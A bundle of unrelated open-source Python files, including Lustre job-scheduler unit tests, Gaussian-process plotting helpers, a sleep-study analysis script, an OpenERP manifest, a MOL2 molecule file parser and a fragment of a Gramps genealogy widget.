the supported protocols. The following protocols are supported:
http://www.mywebserver.com/MyFile.doc - `GXHTTP <geosoft.gxapi.GXHTTP>`
dap://my.dap.server.com/dcs?DatasetName?MyFile.doc - DAP (DAP Document Access)
ftp://my.ftp.server.com/Dir1/MyFile.doc - FTP protocol
The full file name will be stored but no data will be stored with
the `GXDOCU <geosoft.gxapi.GXDOCU>` class and the document can be retrieved using the sGetFile_DOCU
method.
"""
self._set_file(type.encode(), name.encode(), file.encode())
def set_file_meta(self, type, name, file):
"""
Set the document from a file source with metadata.
:param type: Document type extension
:param name: Document name, if NULL use file name
:param file: Document file or URL
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** See `set_file <geosoft.gxapi.GXDOCU.set_file>`.
        This function is the same as sSetFile_DOCU, plus ensures that a
`GXMETA <geosoft.gxapi.GXMETA>` exists that includes the "Data" class. If the file has
associated metadata, either supported natively in the file, or
through an associated file "filename.extension.GeosoftMeta",
that metadata will be loaded into the `GXDOCU <geosoft.gxapi.GXDOCU>` meta, and a Data
class will be constructed if one does not exist.
Also, the Document type Extension is very important in that it
specifies the document types that natively have metadata. The
ones currently supported are:
"map" Geosoft map file
"gdb" Geosoft database
"grd" Geosoft grid file
"""
self._set_file_meta(type.encode(), name.encode(), file.encode())
def set_meta(self, meta):
"""
Set the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` to add to the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._set_meta(meta)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
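# Hand-written usage sketch (this block is reserved for non-generated code; the
# file name, document type and open mode below are illustrative placeholders only):
#
#   docu = GXDOCU.create()
#   docu.set_file("pdf", "Survey report", "C:/data/report.pdf")
#   docu.open(0)          # a DOCU_OPEN mode constant from geosoft.gxapi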
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | bsd-2-clause | 653,045,108,704,022,000 | 27.257069 | 135 | 0.589937 | false |
intel-hpdd/intel-manager-for-lustre | tests/unit/services/job_scheduler/test_target.py | 1 | 10758 | from chroma_core.lib.cache import ObjectCache
from chroma_core.models import ManagedTargetMount
from chroma_core.models import Nid
from chroma_core.services.job_scheduler.job_scheduler_client import JobSchedulerClient
from chroma_core.models import ManagedTarget, ManagedMgs, ManagedHost
from tests.unit.chroma_core.helpers import freshen
from tests.unit.chroma_core.helpers import MockAgentRpc
from tests.unit.services.job_scheduler.job_test_case import JobTestCaseWithHost
class TestMkfsOverrides(JobTestCaseWithHost):
def test_mdt_override(self):
import settings
self.create_simple_filesystem(self.host, start=False)
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
settings.LUSTRE_MKFS_OPTIONS_MDT = "-E block_size=1024"
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mdt.managedtarget_ptr, "formatted")
cmd, args = MockAgentRpc.skip_calls(["device_plugin", "export_target"])
self.assertEqual(cmd, "format_target")
self.assertDictContainsSubset({"mkfsoptions": settings.LUSTRE_MKFS_OPTIONS_MDT}, args)
def test_ost_override(self):
import settings
self.create_simple_filesystem(self.host, start=False)
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
settings.LUSTRE_MKFS_OPTIONS_OST = "-E block_size=2048"
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.ost.managedtarget_ptr, "formatted")
cmd, args = MockAgentRpc.skip_calls(["device_plugin", "export_target"])
self.assertEqual(cmd, "format_target")
self.assertDictContainsSubset({"mkfsoptions": settings.LUSTRE_MKFS_OPTIONS_OST}, args)
class TestTargetTransitions(JobTestCaseWithHost):
def setUp(self):
super(TestTargetTransitions, self).setUp()
self.mgt, mgt_tms = ManagedMgs.create_for_volume(self._test_lun(self.host).id, name="MGS")
ObjectCache.add(ManagedTarget, self.mgt.managedtarget_ptr)
for tm in mgt_tms:
ObjectCache.add(ManagedTargetMount, tm)
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "unformatted")
def test_start_stop(self):
from chroma_core.models import ManagedMgs
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "unmounted")
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "unmounted")
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "mounted")
def test_removal(self):
from chroma_core.models import ManagedMgs
self.mgt.managedtarget_ptr = self.set_and_assert_state(freshen(self.mgt.managedtarget_ptr), "removed")
with self.assertRaises(ManagedMgs.DoesNotExist):
ManagedMgs.objects.get(pk=self.mgt.pk)
self.assertEqual(ManagedMgs._base_manager.get(pk=self.mgt.pk).state, "removed")
def test_removal_mount_dependency(self):
"""Test that when removing, if target mounts cannot be unconfigured,
the target is not removed"""
from chroma_core.models import ManagedMgs
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
try:
# Make it so that the mount unconfigure operations will fail
MockAgentRpc.succeed = False
# -> the TargetMount removal parts of this operation will fail, we
# want to make sure that this means that Target deletion part
# fails as well
self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed", check=False)
ManagedMgs.objects.get(pk=self.mgt.pk)
self.assertNotEqual(ManagedMgs._base_manager.get(pk=self.mgt.pk).state, "removed")
finally:
MockAgentRpc.succeed = True
# Now let the op go through successfully
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed")
with self.assertRaises(ManagedMgs.DoesNotExist):
ManagedMgs.objects.get(pk=self.mgt.pk)
self.assertEqual(ManagedMgs._base_manager.get(pk=self.mgt.pk).state, "removed")
def test_lnet_dependency(self):
"""Test that if I try to stop LNet on a host where a target is running,
stopping the target calculated as a dependency of that"""
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.lnet_configuration = self.assertState(self.host.lnet_configuration, "lnet_up")
consequences = JobSchedulerClient.get_transition_consequences(self.host.lnet_configuration, "lnet_down")
self.assertEqual(len(consequences["dependency_jobs"]), 1)
self.assertEqual(consequences["dependency_jobs"][0]["class"], "StopTargetJob")
def test_reformat_idempotency(self):
"""
Test that if a volume format passes its initial check for existing filesystems,
then it will format successfully even if the initial format operation is stopped
and restarted. To do that it has to pass reformat=True the second time
"""
path = self.mgt.managedtargetmount_set.get().volume_node.path
try:
MockAgentRpc.fail_commands = [
(
"format_target",
{
"device": path,
"target_types": "mgs",
"backfstype": "ldiskfs",
"device_type": "linux",
"target_name": "MGS",
},
)
]
command = self.set_and_assert_state(self.mgt.managedtarget_ptr, "formatted", check=False)
self.assertEqual(freshen(command).complete, True)
self.assertEqual(freshen(command).errored, True)
finally:
MockAgentRpc.fail_commands = []
# Check that the initial format did not pass the reformat flag
self.assertEqual(
MockAgentRpc.skip_calls(["device_plugin"]),
(
"format_target",
{
"device": path,
"target_types": "mgs",
"backfstype": "ldiskfs",
"device_type": "linux",
"target_name": "MGS",
},
),
)
# This one should succeed
self.set_and_assert_state(self.mgt.managedtarget_ptr, "formatted", check=True)
# Check that it passed the reformat flag
self.assertEqual(
MockAgentRpc.skip_calls(["device_plugin", "export_target"]),
(
"format_target",
{
"device": path,
"target_types": "mgs",
"backfstype": "ldiskfs",
"device_type": "linux",
"target_name": "MGS",
"reformat": True,
},
),
)
class TestSharedTarget(JobTestCaseWithHost):
mock_servers = {
"pair1": {
"fqdn": "pair1.mycompany.com",
"nodename": "test01.pair1.mycompany.com",
"nids": [Nid.Nid("192.168.0.1", "tcp", 0)],
},
"pair2": {
"fqdn": "pair2.mycompany.com",
"nodename": "test02.pair2.mycompany.com",
"nids": [Nid.Nid("192.168.0.2", "tcp", 0)],
},
}
def setUp(self):
super(TestSharedTarget, self).setUp()
self.mgt, tms = ManagedMgs.create_for_volume(
self._test_lun(
ManagedHost.objects.get(address="pair1"), secondary_hosts=[ManagedHost.objects.get(address="pair2")]
).id,
name="MGS",
)
ObjectCache.add(ManagedTarget, self.mgt.managedtarget_ptr)
for tm in tms:
ObjectCache.add(ManagedTargetMount, tm)
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "unformatted")
def test_clean_setup(self):
# Start it normally the way the API would on creation
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.assertEqual(ManagedTarget.objects.get(pk=self.mgt.pk).state, "mounted")
self.assertEqual(
ManagedTarget.objects.get(pk=self.mgt.pk).active_mount,
ManagedTargetMount.objects.get(host=self.hosts[0], target=self.mgt),
)
def test_teardown_unformatted(self):
self.assertEqual(ManagedTarget.objects.get(pk=self.mgt.pk).state, "unformatted")
try:
# We should need no agent ops to remove something we never formatted
MockAgentRpc.succeed = False
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed")
finally:
MockAgentRpc.succeed = True
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
def test_teardown_remove_primary_host(self):
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.set_and_assert_state(self.mgt.primary_host, "removed")
# Removing the primary server removes the target
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
def test_teardown_remove_secondary_host(self):
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.set_and_assert_state(self.mgt.failover_hosts[0], "removed")
# Removing the secondary server removes the target
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
def test_teardown_friendly_user(self):
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
# Friendly user stops the target
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "unmounted")
# Friendly user removes the target
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed")
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
# Friendly user removes the secondary host
self.hosts[1] = self.set_and_assert_state(self.hosts[1], "removed")
# Friendly user removes the primary host
self.hosts[0] = self.set_and_assert_state(self.hosts[0], "removed")
| mit | 2,544,299,062,029,315,000 | 42.731707 | 116 | 0.634783 | false |
nealegibson/GeePea | src/GPUtils.py | 1 | 6261 | """
Some non-core utility functions for GPs
"""
from __future__ import print_function
import numpy as np
import pylab
try:
import dill
dill_available = 'yes'
except ImportError: dill_available = 'no'
####################################################################################################
def load(filename):
"""
Simple function to load a GP from a file using dill
"""
if not dill_available:
# raise ImportError, "dill module not found. can't load gp"
raise ImportError("dill module not found. can't load gp")
else:
        file = open(filename, 'rb')  # dill streams must be read in binary mode
gp = dill.load(file)
file.close()
return gp
def save(ob,filename):
"""
Simple function to save GP or group to file using dill
"""
if not dill_available:
print("dill module not available. can't save gp")
else:
        file = open(filename, 'wb')  # dill streams must be written in binary mode
dill.dump(ob,file)
file.close()
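# Round-trip sketch (illustrative only; 'my_gp' and the file name are placeholders):
#
#   save(my_gp, 'my_gp.dill')
#   my_gp_again = load('my_gp.dill')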
def RandomVector(K,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
"""
if m is None: #set mean function if not given
m = np.zeros(K[:,0].size)
return np.random.multivariate_normal(m,K)
def RandVectorFromConditionedGP(K_s,PrecMatrix,K_ss,r,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
m - mean function
calculates conditional covariance K_ss
calculates conditional mean and adds to mean function
"""
#ensure all data are in matrix form
K_s = np.matrix(K_s)
K_ss = np.matrix(K_ss)
PrecMatrix = np.matrix(PrecMatrix)
r = np.matrix(np.array(r).flatten()).T # (n x 1) column vector
# (q x n) = (q x n) * (n x n) * (n x 1)
f_s = K_s * PrecMatrix * r
# (q x q) = (q x q) - (q x n) * (n x n) * (n x q)
K_ss_cond = K_ss - np.matrix(K_s) * PrecMatrix * np.matrix(K_s).T
if m is None: #set zero mean function if not given
m = np.zeros(f_s.size)
return RandomVector(K_ss_cond,m=np.array(f_s).flatten()+m)
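# The two matrix lines above implement the standard GP conditioning identities,
# with K the training covariance, K_s the cross-covariance, K_ss the test
# covariance and r the observed residuals:
#   conditional mean:        f_s   = K_s K^-1 r
#   conditional covariance:  K_ss' = K_ss - K_s K^-1 K_s^T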
def PlotRange(ax,x,y,y_err,sigma=1.0,facecolor='0.5',alpha=0.6):
"""
Plot a range 'area' for GP regression given x,y values, y_error and no. sigma
"""
y1,y2 = y+sigma*y_err, y-sigma*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=facecolor,alpha=alpha)
def PlotSigmas(x,y,y_err,nsig=3,color='r',alpha=0.5):
"""
  Plot lines at +/- 1..nsig sigma for GP regression given x,y values, y_error
"""
if type(color) is str: #create list
color = [color,]*(nsig+1)
for i in np.arange(-nsig,nsig+1):
pylab.plot(x,y+y_err*i,'-',color=color[np.abs(i)],alpha=alpha,lw=0.5)
def PlotDensity(x,y,yerr,n=200,nsig=5.,cmap='gray_r',sm_x=None,supersamp=None,**kwargs):
#need to resample to a regular spacing
if supersamp is None: supersamp = 1
x_new = np.linspace(x.min(),x.max(),x.size*supersamp)
y = np.interp(x_new,x,y)
yerr = np.interp(x_new,x,yerr)
x = x_new
#set range of y
y_lower,y_upper = (y-nsig*yerr).min(),(y+nsig*yerr).max()
y_range = np.linspace(y_lower,y_upper,n)
#set image extent
x_spacing = x[1]-x[0]
y_spacing = y[1]-y[0]
extent = [x.min()-x_spacing/2.,x.max()+x_spacing/2., y_range[0]-y_spacing/2.,y_range[-1]+y_spacing/2.]
print(y_spacing)
XX,YY = np.meshgrid(x,y_range)
IM = np.exp(-((YY-y)**2 / yerr**2)/2.)
#smooth in x?
  if sm_x:
    from scipy import ndimage  # local import; only needed for optional smoothing
    IM = ndimage.gaussian_filter1d(IM, sigma=sm_x, axis=1)
#IM = ndimage.median_filter(IM, footprint=(1,3))
#mask the array below nsig sigma - this allows overlapping transits, and presumably
#lowers file size
MaskedIM = np.ma.masked_where(IM<np.exp(-0.5*nsig**2),IM)
pylab.imshow(MaskedIM, cmap=cmap, aspect='auto', origin='lower', extent=extent, \
vmin=np.exp(-0.5*nsig**2),vmax=1,interpolation='gaussian',alpha=1.0,**kwargs)
return IM
def PlotRanges(x,y,y_err,lc='k',ls='-',title=None,lw=1,lw2=-1,c2='0.8',c1='0.6',alpha=0.8,ax=None):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if ax==None: ax = pylab.gca()
ax.plot(x, y, color=lc, linewidth=lw, linestyle=ls,alpha=alpha) #plot predictive function and ranges
if lw2 < 0: lw2 = lw/2.
y1,y2 = y+2*y_err, y-2*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c2,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
y1,y2 = y+1*y_err, y-1*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c1,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
#pylab.plot()
if title: pylab.title(title)
def PlotData(x,y,y_err,title=None,fmt='o',ms=4,mfc='0.9',mec='k',ecolor='k',alpha=0.8,capsize=2,ax=None,**kwargs):
"""
Plot the data
"""
if ax==None: ax = pylab.gca()
#ax.errorbar(x,y,yerr=y_err,fmt='ko',fc='r',**kwargs)
ax.errorbar(x,y,yerr=y_err,fmt=fmt,ms=ms,mfc=mfc,mec=mec,ecolor=ecolor,\
alpha=alpha,capsize=capsize,**kwargs)
if title: pylab.title(title)
pylab.plot()
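# Typical combination of the two helpers above (sketch; the arrays are placeholders
# produced elsewhere, e.g. by a GP prediction):
#
#   PlotData(x_obs, y_obs, y_obs_err)        # observations with error bars
#   PlotRanges(x_pred, y_pred, y_pred_err)   # predictive mean with 1- and 2-sigma bands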
def PlotRange3D(ax,x1_pred,x2_pred,f_pred,f_pred_err,sigma=1.,facecolor=['r','g'],plot_range=True):
"""
Plot a range 'surface' for GP regression given X,f values, f_error and no. sigma
onto 3D axis 'ax'
"""
from matplotlib.mlab import griddata
#create X,Y mesh grid
xi, yi = np.arange(x1_pred.min(),x1_pred.max(),0.1), np.arange(x2_pred.min(),x2_pred.max(),0.1)
X, Y = np.meshgrid(xi, yi)
#use grid data to place (x1_pred, x2_pred, f_pred) values onto Z grid
Z = griddata(x1_pred, x2_pred, f_pred, xi, yi) #grid the predicted data
Z_u = griddata(x1_pred, x2_pred, f_pred+f_pred_err*sigma, xi, yi) #and error data...
Z_d = griddata(x1_pred, x2_pred, f_pred-f_pred_err*sigma, xi, yi)
#plot the surfaces on the axis (must be passed a 3D axis)
ax.plot_wireframe(X,Y,Z,color=facecolor[0],rstride=1,cstride=1)
if plot_range:
ax.plot_wireframe(X,Y,Z_u,color=facecolor[1],rstride=2,cstride=2)
ax.plot_wireframe(X,Y,Z_d,color=facecolor[1],rstride=2,cstride=2)
####################################################################################################
def add_n_par(N):
"""
Simple decorator function to add n_par to a static function - required for built in mean function
"""
def decor(func):
func.n_par = N
return func
return decor
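# Example use of the decorator (sketch): tag a mean function with the number of
# parameters it expects, so GP code can query func.n_par.
#
#   @add_n_par(2)
#   def linear_mean(p, x):
#       return p[0] + p[1] * x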
###############################################################################################################
| gpl-3.0 | -4,645,364,629,243,388,000 | 30.305 | 114 | 0.612362 | false |
KHP-Informatics/sleepsight-analytics | generate_thesis_outputs.py | 1 | 5023 |
import numpy as np
from tools import Logger, Participant
import thesis as T
path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/data/'
plot_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/plots/'
log_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/logs/'
options = {'periodicity': False,
'participant-info': False,
'compliance': False,
'stationarity': False,
'symptom-score-discretisation': False,
'feature-delay': False,
'feature-selection': False,
'non-parametric-svm': False,
'non-parametric-gp': True
}
log = Logger(log_path, 'thesis_outputs.log', printLog=True)
# Load Participants
log.emit('Loading participants...', newRun=True)
aggr = T.Aggregates('.pkl', path, plot_path)
# Export Periodicity tables
if options['periodicity']:
log.emit('Generating PERIODCITY table...')
pt = T.PeriodictyTable(aggr, log)
pt.run()
pt.exportLatexTable(summary=False)
pt.exportLatexTable(summary=True)
# Export Participant Info
if options['participant-info']:
log.emit('Generating PARTICIPANTS-INFO table...')
participantInfo = aggr.getPariticpantsInfo()
features = [
'id',
'gender',
'age',
'durationIllness',
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'Clozapine',
'No.of.Drugs'
]
participantInfoSelect = participantInfo[features]
aggr.exportLatexTable(participantInfoSelect, 'DataParticipantInfo')
# Compliance
if options['compliance']:
log.emit('Generating COMPLIANCE figure and table...')
# Compliance Figure
comp = T.Compliance(aggr, log)
comp.generateFigure(show=False, save=True)
comp.exportLatexTable(save=True)
# Compliance Information Gain
comp = T.Compliance(aggr, log)
comp.normaliseMissingness()
labelsNoMissingness = comp.dfCount.T['No Missingness']
labelsSleep = comp.dfCount.T['sleep']
labelsSymptom = comp.dfCount.T['symptom']
infoTable = aggr.getPariticpantsInfo()
labels = {'Passive data': labelsNoMissingness,
'Active (Sleep Q.)': labelsSleep,
'Active (Symptoms Q.)': labelsSymptom}
features = [
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'age',
'durationIllness',
'gender',
'Clozapine',
'No.of.Drugs'
]
igTable = T.InfoGainTable(infoTable[features], labels)
igTable.run()
igTable.exportLatexTable(aggr.pathPlot, orderedBy='Passive data', save=True)
# Stationarity results
if options['stationarity']:
log.emit('Generating STATIONARITY table...')
stTable = T.StationaryTable(aggr, log)
stTable.run()
stTable.exportLatexTable(show=False, save=True)
# Symptom Score discretisation
if options['symptom-score-discretisation']:
log.emit('Generating SYMPTOM-SCORE-DISCRETISATION table...')
disTable = T.DiscretisationTable(aggr, log)
disTable.run()
disTable.exportLatexTable(show=False, save=True)
# feature delay
if options['feature-delay']:
log.emit('Generating FEATURE-DELAY table...')
dEval = T.DelayEval(aggr, log)
dEval.generateDelayTable()
dEval.exportLatexTable()
# feature selection with MIFS & mRMR
if options['feature-selection']:
log.emit('Generating FEATURE-SELECTION table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fs.generateFigure(show=True)
# SVM-linear results
if options['non-parametric-svm']:
log.emit('Generating NON-PARAMETRIC-SVM table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fMifs = []
fMrmr = []
for table in fs.histogramsFs:
if 'MIFS-ADASYN' in table.columns:
fMifs = list(table.index[0:10])
if 'mRMR-ADASYN' in table.columns:
fMrmr = list(table.index[0:10])
totalF = {
'mRMR': {'ADASYN': {'fRank': fMifs}},
'MIFS': {'ADASYN': {'fRank': fMrmr}}
}
results = T.compute_SVM_on_all_participants(aggr, totalF, log)
pTotal = Participant(id=99, path=path)
pTotal.id = 'Total'
pTotal.nonParametricResults = results
aggr.aggregates.append(pTotal)
npEval = T.NonParametricSVMEval(aggr, log)
npEval.logClassificationReports()
npEval.summarise()
npEval.exportLatexTable(show=True)
log.emit('\n{}'.format(np.mean(npEval.summary)), indents=1)
log.emit('\n{}'.format(np.std(npEval.summary)), indents=1)
# GP results
if options['non-parametric-gp']:
gpEval = T.GaussianProcessEval(aggr, log)
gpEval.logClassificationReports()
gpEval.exportLatexTable(mean=False)
gpEval.exportLatexTable(mean=True)
gpEval.plotSummaryGP(plot_path)
| apache-2.0 | -5,265,038,417,409,206,000 | 31.198718 | 80 | 0.643241 | false |
3dfxsoftware/cbss-addons | account_chart_wiz_dates/__openerp__.py | 1 | 1726 | # -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2010 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo ([email protected])
############################################################################
# Coded by: Luis Torres ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name" : "Wizard Account Chart Dates",
"version" : "1.0",
"author" : "Vauxoo",
"category" : "Generic Modules",
"description" : """
    Adds initial and end date fields to the account chart wizard.
""",
"website" : "http://www.vauxoo.com/",
"license" : "AGPL-3",
"depends" : ["account",
],
"init_xml" : [],
"demo_xml" : [],
"update_xml" : [
"wizard/account_chart_view.xml",
],
"installable" : True,
"active" : False,
}
| gpl-2.0 | -4,364,303,108,559,540,000 | 36.521739 | 78 | 0.522596 | false |
platinhom/CADDHom | python/format/HHmol2.py | 1 | 4222 |
# -*- coding: utf-8 -*-
"""
Created on 2015-10-05
@author: Zhixiong Zhao
"""
import __init__
from HHFormat import *
import molecule.HHMolecule
import molecule.HHAtom
import molecule.HHResidue
import molecule.HHBond
import geometry.HHPoint
Mol=molecule.HHMolecule.Molecule
Atom=molecule.HHAtom.Atom
Res=molecule.HHResidue.Residue
Bond=molecule.HHBond.Bond
Point=geometry.HHPoint.Point
class MOL2(FileFormator):
extension=['mol2'];
    def CreateAtomLine(self, atom, lenatom=4, lenres=3):
        # Format one atom record for the @<TRIPOS>ATOM section.
        output=str(atom.index).rjust(lenatom)+" "+atom.name.ljust(5)
        output+=("%.4f" % atom.coordinates.x).rjust(11) + ("%.4f" % atom.coordinates.y).rjust(11)+ ("%.4f" % atom.coordinates.z).rjust(11)+ ' '
        output+=atom.atype.ljust(6)+str(atom.resid).rjust(lenres)+ ' ' + atom.resname.ljust(6)+ str(atom.charge).rjust(9)+ os.linesep
        return output
    def CreateBondline(self, bond, lenbond=4):
        # Format one bond record for the @<TRIPOS>BOND section.
        output=str(bond.index).rjust(lenbond)+" "+str(bond.idx_bgn).rjust(lenbond)+" "+\
               str(bond.idx_end).rjust(lenbond)+" "+bond.btype.lower().ljust(lenbond)+ os.linesep
        return output
    def WriteObj(self,obj):
        # Dispatch on object type: a single atom, all atoms of a residue or
        # molecule, a bond record, or anything else written as plain text.
        if (isinstance(obj,Atom)):
            self.write(self.CreateAtomLine(obj))
        elif(isinstance(obj,Res) or isinstance(obj,Mol)):
            for atom in obj.atoms:
                self.write(self.CreateAtomLine(atom))
        elif(isinstance(obj,Bond)):
            self.write(self.CreateBondline(obj));
        else:
            self.write(str(obj));
def ReadAtomLine(self, Line):
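        # Parse one @<TRIPOS>ATOM record: index, name, x, y, z, SYBYL type,
        # and (when present) residue id, residue name and partial charge.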
items=Line.split()
atom=Atom()
atom.index = int(items[0])
atom.atomid = int(items[0])
atom.name = items[1]
atom.coordinates = Point(float(items[2]), float(items[3]), float(items[4]))
atom.atype=items[5]
#sybyl type
#atom.element_name=atom.atype[0:2].strip('.').strip()
atom.element_name=atom.DeduceElementFromName(atom.name);
if len(items)==9:
atom.resid = int(items[6])
atom.resname = items[7]
atom.charge = items[8]
return atom;
def ReadBondLine(self, Line):
items=Line.split()
bond=Bond()
bond.index = int(items[0])
bond.idx_bgn = int(items[1])
        bond.idx_end = int(items[2])
bond.btype = items[3]
return bond;
    def WriteMolFile(self,mol,filename):
        # Write a molecule out as a Tripos MOL2 file.
        self.open(filename,'w');
        self.write("@<TRIPOS>MOLECULE\n")
        self.write(mol.name+'\n')
        self.write("%5d %5d %5d %5d %5d \n" % (mol.GetNumAtom(), mol.GetNumBond(), mol.GetNumFrag(), 0, 0));
        self.write("@<TRIPOS>ATOM\n");
        self.WriteObj(mol);
        self.write("@<TRIPOS>BOND\n");
        for bond in mol.bonds:
            self.WriteObj(bond);
        self.close();
def ReadMolFile(self, filename):
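        # Parse a (possibly multi-molecule) MOL2 file; the find* flags track
        # which @<TRIPOS> section the current line belongs to.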
self.open(filename,'r');
findmol=False;
findatom=False;
findbond=False;
nextmol=False;
mols=[]
mol=None
for line in self.handle:
if (line[:17] == "@<TRIPOS>MOLECULE"):
findmol=True;
findatom=False;
findbond=False;
if (nextmol):
mols.append(mol)
nextmol=False;
mol=Mol()
continue;
if (line[:13] == "@<TRIPOS>ATOM"):
findatom=True;
findmol=False;
nextmol=True;
continue;
if (line[:13] == "@<TRIPOS>BOND"):
findatom=False;
findbond=True;
continue;
if (findbond and line[:9]=="@<TRIPOS>"):
findbond=False;
continue;
if (findatom):
atom=self.ReadAtomLine(line);
atom.mol=mol;
                mol.atoms.append(atom);
if (findbond):
bond=self.ReadBondLine(line);
bond.mol=mol;
bond.SetAtomsFromIdx()
mol.bonds.append(bond);
mols.append(mol);
self.close();
if (len(mols)==1):return mols[0];
elif (len(mols)>1):return mols;
elif (len(mols)==0):return None;
if __name__=="__main__":
mr=MOL2()
a=mr.ReadMolFile("test.mol2");
print a
print a.atoms[0]
| gpl-2.0 | 2,584,344,862,297,078,300 | 30.044118 | 143 | 0.541686 | false |
ondrokrc/gramps | gramps/gui/editors/displaytabs/backreflist.py | 1 | 4638 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2009-2011 Gary Burton
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Python classes
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# GTK libraries
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
#-------------------------------------------------------------------------
#
# GRAMPS classes
#
#-------------------------------------------------------------------------
from ...widgets import SimpleButton
from .embeddedlist import EmbeddedList, TEXT_COL, MARKUP_COL, ICON_COL
from ...utils import edit_object
#-------------------------------------------------------------------------
#
# BackRefList
#
#-------------------------------------------------------------------------
class BackRefList(EmbeddedList):
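    # Embedded list tab showing the objects that refer back to the object
    # being edited; entries can only be opened for editing, not added/removed.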
_HANDLE_COL = 3
#index = column in model. Value =
    # (name, sortcol in model, width, markup/text, weight_col)
_column_names = [
(_('Type'), 0, 100, TEXT_COL, -1, None),
(_('ID'), 1, 75, TEXT_COL, -1, None),
(_('Name'), 2, 250, TEXT_COL, -1, None),
]
def __init__(self, dbstate, uistate, track, obj, refmodel, callback=None):
self.obj = obj
EmbeddedList.__init__(self, dbstate, uistate, track,
_('_References'), refmodel)
self._callback = callback
self.connectid = self.model.connect('row-inserted', self.update_label)
self.track_ref_for_deletion("model")
def update_label(self, *obj):
if self.model.count > 0:
self._set_label()
if self._callback and self.model.count > 1:
